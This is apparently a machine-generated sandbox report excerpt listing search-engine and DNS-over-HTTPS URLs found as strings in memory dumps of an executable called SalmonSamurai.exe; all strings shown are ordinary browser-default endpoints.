Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nl.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nl.search.yahoo.com/favicon.icohttps://nl.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nl.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nl.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nz.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nz.search.yahoo.com/favicon.icohttps://nz.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nz.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nz.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://oceanhero.today/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://oceanhero.today/favicon.icohttps://oceanhero.today/web?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://oceanhero.today/web?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://odvr.nic.cz/doh
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://odvr.nic.cz/dohodvr.nic.cz185.43.135.1193.17.47.12001:148f:fffe::12001:148f:ffff::1
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://pe.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://pe.search.yahoo.com/favicon.icohttps://pe.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://pe.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://pe.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).No
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://petalsearch.com/search?query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ph.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ph.search.yahoo.com/favicon.icohttps://ph.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ph.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ph.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://public.dns.iij.jp/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://public.dns.iij.jp/IIJ
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://qc.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://qc.search.yahoo.com/favicon.icohttps://qc.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://qc.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://qc.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://se.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://se.search.yahoo.com/favicon.icohttps://se.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://se.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search-static-dre.dbankcdn.com/pc/v1/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search-static-dre.dbankcdn.com/pc/v1/favicon.icohttps://petalsearch.com/search?query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.daum.net/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.daum.net/favicon.icohttps://search.daum.net/search?w=tot&DA=JU5&q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.daum.net/search?w=tot&DA=JU5&q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.gmx.co.uk/web/result?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.gmx.com/web/result?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.gmx.es/web/result?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.gmx.fr/web/result?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.goo.ne.jp/cdn/common/img/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.goo.ne.jp/cdn/common/img/favicon.icohttps://search.goo.ne.jp/web.jsp?MT=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.goo.ne.jp/sgt.jsp?MT=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.goo.ne.jp/web.jsp?MT=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.naver.com/search.naver?ie=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.privacywall.org/suggest.php?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.cz/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.cz/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.cz/favicon.icohttps://search.seznam.cz/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.sk/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.sk/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.sk/favicon.icohttps://search.seznam.sk/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.co.jp/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.co.jp/favicon.icohttps://search.yahoo.co.jp/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.co.jp/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?p=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://searchatlas.centrum.cz/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://searchatlas.centrum.cz/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://searchatlas.centrum.cz/favicon.icohttps://searchatlas.centrum.cz/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/favicon.icohttps://sg.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/search
